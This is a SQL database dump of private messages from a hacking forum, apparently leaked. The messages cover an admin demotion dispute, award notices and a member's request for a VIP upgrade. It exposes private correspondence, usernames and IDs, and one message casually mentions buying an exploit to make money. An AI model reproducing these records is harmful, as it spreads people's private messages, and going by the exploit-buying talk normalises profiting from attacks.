'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. \r\n[/quote]\r\nWhat do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(', '1350707495', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3492', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. \r\n[/quote]\r\nWhat do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(\r\n[/quote]\r\n\r\nEveryone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. ', '1350707586', '0', '3', '1350707690', '1', '0', '0', '1350707635'); INSERT INTO mybb_privatemessages VALUES('3494', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. \r\n[/quote]\r\nWhat do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(\r\n[/quote]\r\n\r\nEveryone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. \r\n[/quote]\r\nI am co founder. So why would I leave? That is hardly a fair statement. You could also write temp admin in the thread.', '1350707690', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3495', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. \r\n[/quote]\r\nWhat do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(\r\n[/quote]\r\n\r\nEveryone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. \r\n[/quote]\r\nI am co founder. So why would I leave? That is hardly a fair statement. You could also write temp admin in the thread.\r\n[/quote]\r\n\r\nYes you are but god forbid something happens or you leave the internet then I\'m the only one who is going to be permanent and the day I leave LH I will make sure I take it down instead of selling it.', '1350707794', '0', '3', '1350707892', '1', '0', '0', '1350707816'); INSERT INTO mybb_privatemessages VALUES('3665', '53', '53', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]sirchamp[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862664', '0', '1', '0', '1', '0', '0', '1350918796'); INSERT INTO mybb_privatemessages VALUES('3666', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]R?????zo?[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862676', '0', '1', '0', '1', '0', '0', '1350910093'); INSERT INTO mybb_privatemessages VALUES('3667', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]NXK[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862684', '0', '1', '0', '1', '0', '0', '1350865753'); INSERT INTO mybb_privatemessages VALUES('3668', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]iTzIpod[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862696', '0', '1', '0', '1', '0', '0', '1350862727'); INSERT INTO mybb_privatemessages VALUES('3669', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n', '1350862815', '0', '3', '1350862927', '1', '0', '0', '1350862885'); INSERT INTO mybb_privatemessages VALUES('3670', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]xEP1C_SC0P3Sx[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Gamer\r\nDescription: You are too addicted to gaming.\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862828', '0', '1', '0', '1', '0', '0', '1350862862'); INSERT INTO mybb_privatemessages VALUES('3497', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. \r\n[/quote]\r\nWhat do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(\r\n[/quote]\r\n\r\nEveryone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. \r\n[/quote]\r\nI am co founder. So why would I leave? That is hardly a fair statement. You could also write temp admin in the thread.\r\n[/quote]\r\n\r\nYes you are but god forbid something happens or you leave the internet then I\'m the only one who is going to be permanent and the day I leave LH I will make sure I take it down instead of selling it.\r\n[/quote]\r\nAright. :P My mom is raging hard I gtg night. :)', '1350707892', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3498', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: Yo', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\nWhat\'s up? I do not really feel like going on skype atm:P . Just tell me through pm?\r\n[/quote]\r\n\r\nYes, PM me back so I know you are online now. \r\n[/quote]\r\nOnline.\r\n[/quote]\r\n\r\nI checked out HF recently and I have found out that you are more active on HF than LH. I know LH is nothing compared to HFs activity but everyones activity will help keep LH up. It\'s a matter of teamwork. You don\'t sometimes come online on LH but I have noticed that you have been online on HF. I thought you considered me your BFF and when I make decisions without you then you question me. You are not there so I can\'t wait 24+ hours. 90% of the active members have been complaining that you are inactive.\r\n\r\nI\'m sorry but I have to demote you, but would you like to become a Mod or Elite?\r\n[/quote]\r\nAre you shitting me I have like 2 posts in two weeks on hf.... Also I have been getting more active. I only asked about reborn because you said he wsa never going to be again. I have been online everyday the last few weeks. I just do not post whore. We are bff\' but to just demote me.... Idk Maybe we could be cool if you put me back. I go to a academic school so yes I need to make sure I have good grades. To just demote me....\r\n[/quote]\r\n\r\nI understand you have school, we all do. I\'m not saying that I\'m not being your friend, I\'m just demoting because I need help moderating LH.\r\n[/quote]\r\nAnd I do. I am not making excuses with school. I am saying I do not always have time to post whore. Also I even just bought a exploit that I was going to use to help make money for the site... Yea I do not care at all-.- (sarcastic). I moderate posts when they need it. Lately I thought we have been doing well. Give me another go. Also Look at my hf stats:\r\n\r\nhttp://i.imgur.com/CifkV.png\r\n\r\n3 posts in the last while.. I have not been active on hf...\r\n[/quote]\r\n\r\nI can make you a Staff member because I need help with coding and shit in ACP and you know coding takes long and I only want 1 admin excluding me.\r\n[/quote]\r\nSo I cannot be admin again? Only you and no one else? And staff is second to admin?\r\n[/quote]\r\n\r\nYou can become Admin again maybe in the Holidays hopefully you are free then. It will be only me and 1 more admin and staff is super moderators which means they can moderate anything and the last step to admin\r\n[/quote]\r\nAlright staff for now. I will tell you when I have less work. It should be slowing down soon. Also I guess it is also time that I can prove myself. Do not admin anyone else. :3 Only you and me. \r\n[/quote]\r\n\r\nHopefully and I made NXK an admin as I said I require help.\r\n[/quote]\r\n.... Temp admin?\r\n[/quote]\r\n\r\nIdk and don\'t worry about it. \r\n[/quote]\r\nWhat do you mean don\'y worry? You said you only want 1 other admin besides you... If he is then I cannot be....:\'(\r\n[/quote]\r\n\r\nEveryone is temp on LH. No one is going to stay on LH forever, I\'m the only one hopefully because I\'m the founder. \r\n[/quote]\r\nI am co founder. So why would I leave? That is hardly a fair statement. You could also write temp admin in the thread.\r\n[/quote]\r\n\r\nYes you are but god forbid something happens or you leave the internet then I\'m the only one who is going to be permanent and the day I leave LH I will make sure I take it down instead of selling it.\r\n[/quote]\r\nAright. :P My mom is raging hard I gtg night. :)\r\n[/quote]\r\n\r\nGud nite. ', '1350707934', '0', '1', '0', '1', '0', '0', '1350708233'); INSERT INTO mybb_privatemessages VALUES('3661', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]xEP1C_SC0P3Sx[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862351', '0', '1', '0', '1', '0', '0', '1350862425'); INSERT INTO mybb_privatemessages VALUES('3662', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.', '1350862589', '0', '3', '1350862656', '1', '0', '0', '1350862609'); INSERT INTO mybb_privatemessages VALUES('3664', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)', '1350862656', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3500', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. \r\n[/quote]\r\n\r\nAlready Done!! , i posted 4 HQ tuts 2 extra :) :\r\n\r\nhttp://l33thacking.net/thread-987.html\r\n\r\nhttp://l33thacking.net/thread-988.html\r\n\r\nhttp://l33thacking.net/thread-989.html\r\n\r\nhttp://l33thacking.net/thread-990.html\r\n[/quote]\r\n\r\nI\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account.\r\n[/quote]\r\n\r\nAlright great!! If you see this PM then be sure to upgrade me mate! :D', '1350711090', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3501', '258', '258', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'skype', '0', 'Hey\r\nWhats your skype name?\r\nGreetings', '1350736478', '0', '3', '1350736708', '1', '0', '2', '1350736689'); INSERT INTO mybb_privatemessages VALUES('3502', '53', '258', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'skype', '0', 'Hey\r\nWhats your skype name?\r\nGreetings', '1350736478', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3503', '53', '53', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: skype', '0', '[quote=\'sirchamp\']\r\nHey\r\nWhats your skype name?\r\nGreetings\r\n[/quote]\r\n\r\nSorry mate , i don\'t have skype', '1350736708', '0', '1', '0', '0', '0', '0', '1350737213'); INSERT INTO mybb_privatemessages VALUES('3504', '258', '53', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: skype', '0', '[quote=\'sirchamp\']\r\nHey\r\nWhats your skype name?\r\nGreetings\r\n[/quote]\r\n\r\nSorry mate , i don\'t have skype', '1350736708', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3505', '258', '258', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: Forum', '0', '[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ 